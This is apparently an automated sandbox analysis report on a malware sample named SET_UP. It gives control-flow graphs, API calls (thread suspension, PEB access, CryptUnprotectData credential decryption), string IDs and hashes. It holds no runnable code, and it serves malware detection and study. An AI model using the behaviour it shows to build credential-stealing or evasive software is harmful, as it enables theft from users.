                                                                                                            control_flow_graph 1118 2dba840-2dba867 1119 2dba870-2dba89d 1118->1119 1119->1119 1120 2dba89f-2dba996 1119->1120 1121 2dba9a0-2dba9be 1120->1121 1121->1121 1122 2dba9c0-2dba9df 1121->1122 1123 2dba9e0-2dba9f7 1122->1123 1123->1123 1124 2dba9f9-2dbaa10 call 2dbb3d0 1123->1124 1126 2dbaa15-2dbaa1c 1124->1126 1127 2dbac5b-2dbac67 1126->1127 1128 2dbaa22-2dbaa2f 1126->1128 1129 2dbaa30-2dbaa42 1128->1129 1129->1129 1130 2dbaa44-2dbaa4a 1129->1130 1131 2dbaa50-2dbaa5b 1130->1131 1132 2dbaa5d-2dbaa60 1131->1132 1133 2dbaa62-2dbaa69 1131->1133 1132->1131 1132->1133 1134 2dbaa6f-2dbaa81 1133->1134 1135 2dbac50-2dbac58 call 2deaeb0 1133->1135 1137 2dbaa90-2dbaab5 1134->1137 1135->1127 1137->1137 1139 2dbaab7-2dbaac1 1137->1139 1140 2dbaac3-2dbaaca 1139->1140 1141 2dbaaf5-2dbaaf9 1139->1141 1144 2dbaad7-2dbaadc 1140->1144 1142 2dbaaff-2dbab29 1141->1142 1143 2dbac4e 1141->1143 1146 2dbab30-2dbab4e 1142->1146 1143->1135 1144->1143 1145 2dbaae2-2dbaae9 1144->1145 1147 2dbaaeb-2dbaaed 1145->1147 1148 2dbaaef 1145->1148 1146->1146 1149 2dbab50-2dbab5a 1146->1149 1147->1148 1150 2dbaaf1-2dbaaf3 1148->1150 1151 2dbaad0-2dbaad5 1148->1151 1152 2dbab5c-2dbab67 1149->1152 1153 2dbab94-2dbab96 1149->1153 1150->1151 1151->1141 1151->1144 1155 2dbab77-2dbab7b 1152->1155 1153->1143 1154 2dbab9c-2dbabb2 1153->1154 1156 2dbabc0-2dbabe0 1154->1156 1155->1143 1157 2dbab81-2dbab88 1155->1157 1156->1156 1158 2dbabe2-2dbabec 1156->1158 1159 2dbab8a-2dbab8c 1157->1159 1160 2dbab8e 1157->1160 1161 2dbabee-2dbabf6 1158->1161 1162 2dbac22-2dbac24 1158->1162 1159->1160 1163 2dbab70-2dbab75 1160->1163 1164 2dbab90-2dbab92 1160->1164 1165 2dbac07-2dbac0b 1161->1165 1166 2dbac2a-2dbac4c call 2dba5a0 1162->1166 1163->1153 1163->1155 1164->1163 1165->1143 1167 2dbac0d-2dbac14 1165->1167 1166->1135 1169 2dbac1a 1167->1169 1170 2dbac16-2dbac18 1167->1170 1172 2dbac1c-2dbac20 1169->1172 1173 2dbac00-2dbac05 1169->1173 1170->1169 1172->1173 1173->1165 1174 2dbac26-2dbac28 1173->1174 1174->1143 1174->1166
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @A$OIKS$U$wY;[$rp
                                                                                                            • API String ID: 0-437407314
                                                                                                            • Opcode ID: b016bb06f6d00daf34e2a0d4ac7fa03076c6026067408ff221b2f0296524e628
                                                                                                            • Instruction ID: b67d21f8ec9fcd44d6e83c784d1ef28499bdcfe380c6e6d0adb7e65395f816d1
                                                                                                            • Opcode Fuzzy Hash: b016bb06f6d00daf34e2a0d4ac7fa03076c6026067408ff221b2f0296524e628
                                                                                                            • Instruction Fuzzy Hash: B1B1E17160C3509BD326DF2484616EBFBE3EFC2208F19892CE4D65B342E7758906CB96

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1175 24d0b03-24d0b4a CreateToolhelp32Snapshot 1178 24d0c20-24d0c23 1175->1178 1179 24d0b50-24d0b71 Thread32First 1175->1179 1180 24d0c0c-24d0c1b 1179->1180 1181 24d0b77-24d0b7d 1179->1181 1180->1178 1182 24d0bec-24d0c06 1181->1182 1183 24d0b7f-24d0b85 1181->1183 1182->1180 1182->1181 1183->1182 1184 24d0b87-24d0ba6 1183->1184 1184->1182 1187 24d0ba8-24d0bac 1184->1187 1188 24d0bae-24d0bc2 Wow64SuspendThread 1187->1188 1189 24d0bc4-24d0bd3 1187->1189 1190 24d0bd8-24d0bea CloseHandle 1188->1190 1189->1190 1190->1182
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,024D0649,?,00000001,?,81EC8B55,000000FF), ref: 024D0B41
                                                                                                            • Thread32First.KERNEL32(00000000,0000001C), ref: 024D0B6D
                                                                                                            • Wow64SuspendThread.KERNEL32(00000000), ref: 024D0BC0
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 024D0BEA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849706056-0
                                                                                                            • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                            • Instruction ID: 269eeb8814616d6666ebfefedc88a0ec38f37aeaaff9a2d515c1b31e2d8b5fb1
                                                                                                            • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                            • Instruction Fuzzy Hash: 44412D75A04108AFDB18DFA8C490FAEB7F6EF88304F108069E6159F794DB34AE45CB54

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1199 2dd1150-2dd1198 call 2defcb0 1202 2dd18ec-2dd18fc 1199->1202 1203 2dd119e-2dd1219 call 2dc3810 call 2deae90 1199->1203 1208 2dd121b-2dd121e 1203->1208 1209 2dd1220-2dd1241 1208->1209 1210 2dd1243-2dd1247 1208->1210 1209->1208 1211 2dd1249-2dd1254 1210->1211 1212 2dd125b-2dd1274 1211->1212 1213 2dd1256 1211->1213 1215 2dd127b-2dd1286 1212->1215 1216 2dd1276 1212->1216 1214 2dd1313-2dd1316 1213->1214 1219 2dd1318 1214->1219 1220 2dd131a-2dd131f 1214->1220 1217 2dd1302-2dd1307 1215->1217 1218 2dd1288-2dd12f8 call 2decae0 1215->1218 1216->1217 1222 2dd1309 1217->1222 1223 2dd130b-2dd130e 1217->1223 1226 2dd12fd 1218->1226 1219->1220 1224 2dd181f-2dd185b call 2deaeb0 1220->1224 1225 2dd1325-2dd1335 1220->1225 1222->1214 1223->1211 1233 2dd185d-2dd1860 1224->1233 1227 2dd1337-2dd1354 1225->1227 1226->1217 1230 2dd14ff 1227->1230 1231 2dd135a-2dd137b 1227->1231 1234 2dd1503-2dd150b 1230->1234 1232 2dd137f-2dd1382 1231->1232 1235 2dd1384-2dd13b5 1232->1235 1236 2dd13b7-2dd13d5 call 2dd1900 1232->1236 1237 2dd1885-2dd1889 1233->1237 1238 2dd1862-2dd1883 1233->1238 1239 2dd150d-2dd1511 1234->1239 1240 2dd1513-2dd1524 call 2deae90 1234->1240 1235->1232 1236->1230 1252 2dd13db-2dd1404 1236->1252 1242 2dd188b-2dd1891 1237->1242 1238->1233 1243 2dd153a-2dd153c 1239->1243 1257 2dd1536-2dd1538 1240->1257 1258 2dd1526-2dd1531 1240->1258 1248 2dd1895-2dd18a9 1242->1248 1249 2dd1893 1242->1249 1245 2dd17f0-2dd17fb 1243->1245 1246 2dd1542-2dd1563 1243->1246 1253 2dd17fd-2dd180d 1245->1253 1254 2dd17ff-2dd1807 1245->1254 1251 2dd1567-2dd156a 1246->1251 1255 2dd18ad-2dd18b3 1248->1255 1256 2dd18ab 1248->1256 1249->1202 1259 2dd156c-2dd15c2 1251->1259 1260 2dd15c4-2dd15ff 1251->1260 1261 2dd1406-2dd1409 1252->1261 1264 2dd180f 1253->1264 1254->1264 1263 2dd18dc-2dd18df 1255->1263 1265 2dd18b5-2dd18da call 2decae0 1255->1265 1256->1263 1257->1243 1266 2dd1811-2dd1815 1258->1266 1259->1251 1267 2dd1601-2dd1604 1260->1267 1268 2dd1438-2dd144f call 2dd1900 1261->1268 1269 2dd140b-2dd1436 1261->1269 1272 2dd18e5-2dd18ea 1263->1272 1273 2dd18e1-2dd18e3 1263->1273 1264->1266 1265->1263 1266->1227 1271 2dd181b-2dd181d 1266->1271 1274 2dd1629-2dd1631 1267->1274 1275 2dd1606-2dd1627 1267->1275 1283 2dd145a-2dd1478 1268->1283 1284 2dd1451-2dd1455 1268->1284 1269->1261 1271->1224 1272->1242 1273->1202 1279 2dd1633-2dd163e 1274->1279 1275->1267 1281 2dd1645-2dd1661 1279->1281 1282 2dd1640 1279->1282 1286 2dd166a-2dd1677 1281->1286 1287 2dd1663-2dd1665 1281->1287 1285 2dd1719-2dd171c 1282->1285 1288 2dd147c-2dd14fd call 2db7ef0 call 2dc3440 call 2db7f00 1283->1288 1289 2dd147a 1283->1289 1284->1234 1290 2dd171e 1285->1290 1291 2dd1725-2dd1744 1285->1291 1292 2dd1708-2dd170d 1286->1292 1293 2dd167d-2dd16f7 call 2decae0 1286->1293 1287->1292 1288->1234 1289->1288 1290->1291 1298 2dd1746-2dd1749 1291->1298 1295 2dd170f 1292->1295 1296 2dd1711-2dd1714 1292->1296 1303 2dd16fc-2dd1703 1293->1303 1295->1285 1296->1279 1301 2dd174b-2dd177f 1298->1301 1302 2dd1781-2dd1792 1298->1302 1301->1298 1305 2dd1794-2dd1798 1302->1305 1306 2dd17c2-2dd17ca 1302->1306 1303->1292 1307 2dd179a-2dd17a1 1305->1307 1308 2dd17dd-2dd17df 1306->1308 1309 2dd17cc-2dd17db call 2deaeb0 1306->1309 1313 2dd17b1-2dd17b4 1307->1313 1314 2dd17a3-2dd17af 1307->1314 1312 2dd17e1-2dd17e4 1308->1312 1309->1312 1312->1245 1317 2dd17e6-2dd17ee 1312->1317 1318 2dd17be-2dd17c0 1313->1318 1319 2dd17b6-2dd17bc 1313->1319 1314->1307 1317->1266 1318->1306 1319->1318
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID: !@$,$o
                                                                                                            • API String ID: 1279760036-388183547
                                                                                                            • Opcode ID: 9960b27023177f188366a0df04f89271d80e3e9078b5a21bddeb4deea8ad5cf8
                                                                                                            • Instruction ID: c3964c1dd83aaf00b8a37159016e0d32a93c4b3af231be7b461fe226ce7166af
                                                                                                            • Opcode Fuzzy Hash: 9960b27023177f188366a0df04f89271d80e3e9078b5a21bddeb4deea8ad5cf8
                                                                                                            • Instruction Fuzzy Hash: B5227C7160CB818FD7249F28C45436EBBE1EB86324F188A2DE5EA873D1D779C845CB52

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1322 2dd5ca0-2dd5cb9 1323 2dd5cc0-2dd5cde 1322->1323 1323->1323 1324 2dd5ce0-2dd5cec 1323->1324 1325 2dd5cee-2dd5cf6 1324->1325 1326 2dd5d34-2dd5d45 1324->1326 1328 2dd5d00-2dd5d07 1325->1328 1327 2dd5d50-2dd5d7a 1326->1327 1327->1327 1329 2dd5d7c-2dd5d82 1327->1329 1330 2dd5d09-2dd5d0c 1328->1330 1331 2dd5d10-2dd5d16 1328->1331 1332 2dd5d88-2dd5da2 call 2deae90 1329->1332 1333 2dd6051-2dd605a 1329->1333 1330->1328 1334 2dd5d0e 1330->1334 1331->1326 1335 2dd5d18-2dd5d2c call 2decae0 1331->1335 1340 2dd5db0-2dd5dcc 1332->1340 1334->1326 1339 2dd5d31 1335->1339 1339->1326 1340->1340 1341 2dd5dce-2dd5dda 1340->1341 1342 2dd5ddc-2dd5de4 1341->1342 1343 2dd5e1f-2dd5e23 1341->1343 1346 2dd5df0-2dd5df7 1342->1346 1344 2dd5e29-2dd5e32 1343->1344 1345 2dd6048-2dd604e call 2deaeb0 1343->1345 1347 2dd5e40-2dd5e55 1344->1347 1345->1333 1349 2dd5df9-2dd5dfc 1346->1349 1350 2dd5e00-2dd5e06 1346->1350 1347->1347 1351 2dd5e57-2dd5e59 1347->1351 1349->1346 1353 2dd5dfe 1349->1353 1350->1343 1354 2dd5e08-2dd5e17 call 2decae0 1350->1354 1355 2dd5e5b 1351->1355 1356 2dd5e60-2dd5e6f call 2db7ef0 1351->1356 1353->1343 1359 2dd5e1c 1354->1359 1355->1356 1361 2dd5e90-2dd5e9a 1356->1361 1359->1343 1362 2dd5e9c-2dd5e9f 1361->1362 1363 2dd5e80-2dd5e8e 1361->1363 1365 2dd5ea0-2dd5eaf 1362->1365 1363->1361 1364 2dd5eb3-2dd5ebb 1363->1364 1367 2dd603f-2dd6045 call 2db7f00 1364->1367 1368 2dd5ec1-2dd5ecc 1364->1368 1365->1365 1366 2dd5eb1 1365->1366 1366->1363 1367->1345 1370 2dd5ece-2dd5ed5 1368->1370 1371 2dd5f1b-2dd5f67 call 2db7ef0 call 2db8d10 1368->1371 1374 2dd5eec-2dd5ef0 1370->1374 1384 2dd5f70-2dd6012 1371->1384 1375 2dd5ee0 1374->1375 1376 2dd5ef2-2dd5efb 1374->1376 1378 2dd5ee1-2dd5eea 1375->1378 1379 2dd5efd-2dd5f00 1376->1379 1380 2dd5f10-2dd5f14 1376->1380 1378->1371 1378->1374 1379->1378 1380->1378 1382 2dd5f16-2dd5f19 1380->1382 1382->1378 1384->1384 1385 2dd6018-2dd603b call 2db8e60 call 2db7f00 1384->1385 1385->1367
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: 8~9*$G"&M$N?>K
                                                                                                            • API String ID: 2994545307-2086580974
                                                                                                            • Opcode ID: da640ed9feb2204c3bfbfb3365d7489bdcc15d1b9a6743c9cc76a5ffe4ab308a
                                                                                                            • Instruction ID: d0534fd0127f697bd64ec7efa8c84f885679c2804606484e2fa649f9e838c0e8
                                                                                                            • Opcode Fuzzy Hash: da640ed9feb2204c3bfbfb3365d7489bdcc15d1b9a6743c9cc76a5ffe4ab308a
                                                                                                            • Instruction Fuzzy Hash: B4914976A147008BE714DF28EC81B6BB3A6EFC5314F99892CD9859B341E734EC05C7A1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1390 24d03f3-24d055b call 24d09a3 call 24d0fa3 call 24d1153 call 24d0d43 1399 24d098c-24d098f 1390->1399 1400 24d0561-24d0568 1390->1400 1401 24d0573-24d0577 1400->1401 1402 24d0599-24d0614 GetPEB 1401->1402 1403 24d0579-24d0597 call 24d0ec3 1401->1403 1404 24d061f-24d0623 1402->1404 1403->1401 1406 24d063b-24d064d call 24d0b03 1404->1406 1407 24d0625-24d0639 1404->1407 1413 24d064f-24d0675 1406->1413 1414 24d0677-24d0698 CreateThread 1406->1414 1407->1404 1415 24d069b-24d069f 1413->1415 1414->1415 1417 24d06a5-24d06d8 call 24d1003 1415->1417 1418 24d0960-24d0983 1415->1418 1417->1418 1422 24d06de-24d072d 1417->1422 1418->1399 1424 24d0738-24d073e 1422->1424 1425 24d0786-24d078a 1424->1425 1426 24d0740-24d0746 1424->1426 1429 24d0858-24d094b call 24d0b03 call 24d09a3 call 24d0fa3 1425->1429 1430 24d0790-24d079d 1425->1430 1427 24d0759-24d075d 1426->1427 1428 24d0748-24d0757 1426->1428 1431 24d075f-24d076d 1427->1431 1432 24d0784 1427->1432 1428->1427 1456 24d094d 1429->1456 1457 24d0950-24d095a 1429->1457 1433 24d07a8-24d07ae 1430->1433 1431->1432 1434 24d076f-24d0781 1431->1434 1432->1424 1437 24d07de-24d07e1 1433->1437 1438 24d07b0-24d07be 1433->1438 1434->1432 1439 24d07e4-24d07eb 1437->1439 1441 24d07dc 1438->1441 1442 24d07c0-24d07cf 1438->1442 1439->1429 1444 24d07ed-24d07f6 1439->1444 1441->1433 1442->1441 1446 24d07d1-24d07da 1442->1446 1444->1429 1447 24d07f8-24d0808 1444->1447 1446->1437 1449 24d0813-24d081f 1447->1449 1452 24d0821-24d084e 1449->1452 1453 24d0850-24d0856 1449->1453 1452->1449 1453->1439 1456->1457 1457->1418
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 024D0696
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID: G
                                                                                                            • API String ID: 2422867632-985283518
                                                                                                            • Opcode ID: 0685426db654a01d0d0fd0f1cf0c4cc28f3fd7b8f4ba8a454a442504fc4fa24e
                                                                                                            • Instruction ID: 59264a1d7855cd38bb1e3e3f9db5b7a74797f36ab2d2401b78e0383ca4eccde3
                                                                                                            • Opcode Fuzzy Hash: 0685426db654a01d0d0fd0f1cf0c4cc28f3fd7b8f4ba8a454a442504fc4fa24e
                                                                                                            • Instruction Fuzzy Hash: B312C4B4E00219DFDB14CF98C990BAEBBB1FF88304F2481AAD515AB385C775AA41CF54

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1458 24d09b3-24d0a0a GetPEB 1459 24d0a15-24d0a19 1458->1459 1460 24d0a1f-24d0a2a 1459->1460 1461 24d0ab9-24d0ac0 1459->1461 1463 24d0ab4 1460->1463 1464 24d0a30-24d0a47 1460->1464 1462 24d0acb-24d0acf 1461->1462 1466 24d0ad1-24d0ade 1462->1466 1467 24d0ae0-24d0ae7 1462->1467 1463->1459 1468 24d0a6c-24d0a84 CreateThread 1464->1468 1469 24d0a49-24d0a6a 1464->1469 1466->1462 1471 24d0ae9-24d0aeb 1467->1471 1472 24d0af0-24d0af5 1467->1472 1473 24d0a88-24d0a90 1468->1473 1469->1473 1471->1472 1473->1463 1475 24d0a92-24d0aaf 1473->1475 1475->1463
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 024D0A7F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread
                                                                                                            • String ID: ,
                                                                                                            • API String ID: 2422867632-3772416878
                                                                                                            • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                            • Instruction ID: ad4d27c94d47d335c876325152c3de0631d14e85302bde9c4635bb5ef1d13317
                                                                                                            • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                            • Instruction Fuzzy Hash: C241C474A00209EFDB14CF98C994BAEBBB1FF88314F258199D515AB381C771AE81CF94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: upqv
                                                                                                            • API String ID: 2994545307-2786491228
                                                                                                            • Opcode ID: 397a0240a71b69c65378c117fe62171fd58bae0b9270df47000765f9b0b7b5ad
                                                                                                            • Instruction ID: 0f5d5d630c75d2369cd89a83faf1a841434335fa6346ec8df8134bc0d63bda84
                                                                                                            • Opcode Fuzzy Hash: 397a0240a71b69c65378c117fe62171fd58bae0b9270df47000765f9b0b7b5ad
                                                                                                            • Instruction Fuzzy Hash: DAC15673B083204FDB28DE28D8912ABB7E2EBD4314F0A893CD9D69B791D6349C05C781
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02DC4C90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: efde1c7594d083db7f5e76f8a79e842a25d8eec1e35de7635cef7e052141cfda
                                                                                                            • Instruction ID: 17fd9e072ae71b1aed93d8961488f947a444c4fcad3e5d6cda38173c0037e8e9
                                                                                                            • Opcode Fuzzy Hash: efde1c7594d083db7f5e76f8a79e842a25d8eec1e35de7635cef7e052141cfda
                                                                                                            • Instruction Fuzzy Hash: BB1129F2C042125FDB388F24D8A177ABBD69F94214F25463DE45AD7390EB348D00CBA1
                                                                                                            APIs
                                                                                                            • LdrInitializeThunk.NTDLL(02DEFE6D,?,00000018,?,?,00000018,?,?,?), ref: 02DECB0E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: b
                                                                                                            • API String ID: 0-1908338681
                                                                                                            • Opcode ID: a9d8afde2d4c998feba901387895bdeccc5352f04984ab49b12e0e0083be5ff1
                                                                                                            • Instruction ID: a7e53b3093d8f04178b71f1d8593f9d1ad3a62b699abed1c50159f29dc81137c
                                                                                                            • Opcode Fuzzy Hash: a9d8afde2d4c998feba901387895bdeccc5352f04984ab49b12e0e0083be5ff1
                                                                                                            • Instruction Fuzzy Hash: A64148329183908BD374DB389C627DF77D2DFD2318F19597EC88AA7385EA3448018796
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2994545307-2766056989
                                                                                                            • Opcode ID: b527684cdaccc9fd1a06932568dd5fd51e34d8a450d3bd08996314965f072223
                                                                                                            • Instruction ID: 1b30d2b2ac6f1fcec61db4858aef8728164520a20ec3c3e0f12884264f033612
                                                                                                            • Opcode Fuzzy Hash: b527684cdaccc9fd1a06932568dd5fd51e34d8a450d3bd08996314965f072223
                                                                                                            • Instruction Fuzzy Hash: 453168325083088FC714EF68D8C16ABB7E5EFD5314F15883CE68A47391E7749908CB91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: RP
                                                                                                            • API String ID: 0-2004230831
                                                                                                            • Opcode ID: a94d81a3573ae80bc873ff207500c80ba67887e54c395b285aab5b7ba610b64b
                                                                                                            • Instruction ID: dd52f0877920f9a4e5acf4f5c4bc01aa9975beddc8a219b859d8767b5d9042d1
                                                                                                            • Opcode Fuzzy Hash: a94d81a3573ae80bc873ff207500c80ba67887e54c395b285aab5b7ba610b64b
                                                                                                            • Instruction Fuzzy Hash: 3731FD7592C3509FD7188F64D822ABBB7F1EF95304F14891CE5CA9B280EB348902C75A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: f9c820a83e51375d0e3b4653d4ff9bf0163b2ea43fce56a06854f619065e3891
                                                                                                            • Instruction ID: ed28c26cd180b980f34126bfabb4d2f7a736f4a7c3222c1f1ec9a739d56e3978
                                                                                                            • Opcode Fuzzy Hash: f9c820a83e51375d0e3b4653d4ff9bf0163b2ea43fce56a06854f619065e3891
                                                                                                            • Instruction Fuzzy Hash: E9812B36A042019FDB29FA28D85067BB3E3FBD4720F19892DE9878B355EB309D51C781
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 4a2c66e1086662d1344c3d05b42b8d4b8e61df934293a7f41dd115e74f79e489
                                                                                                            • Instruction ID: 959c77d1377bb3c85d3971efcdf8a02f407ac42c891d2991760b8681010ad1ae
                                                                                                            • Opcode Fuzzy Hash: 4a2c66e1086662d1344c3d05b42b8d4b8e61df934293a7f41dd115e74f79e489
                                                                                                            • Instruction Fuzzy Hash: 6B61F1766083054FDB10EE28D8C066AB7A3FBC5318F59C97DD1864B35ADB31AC06CB92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48e60dc48fb51661f473d33c8051f81ba38849150c55b0a4be0c7d875d060f35
                                                                                                            • Instruction ID: e7874203b1d85014ea6df4b9b7491a37587a1c280c1854cb2ab506035c6fe619
                                                                                                            • Opcode Fuzzy Hash: 48e60dc48fb51661f473d33c8051f81ba38849150c55b0a4be0c7d875d060f35
                                                                                                            • Instruction Fuzzy Hash: BF41BCA16087118BDB14EF69C82177BB7E2EFE1344F08896CE4C68B351E7399900CB53
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d5c4c73b8cd980c4c8375e1ef1dec9b45bff81b44079878591eca1e68bd64c3
                                                                                                            • Instruction ID: 5c6f0f34d983879f1992c2c6d49586442ae1c6309aa8d8c1fa24d2224f62624c
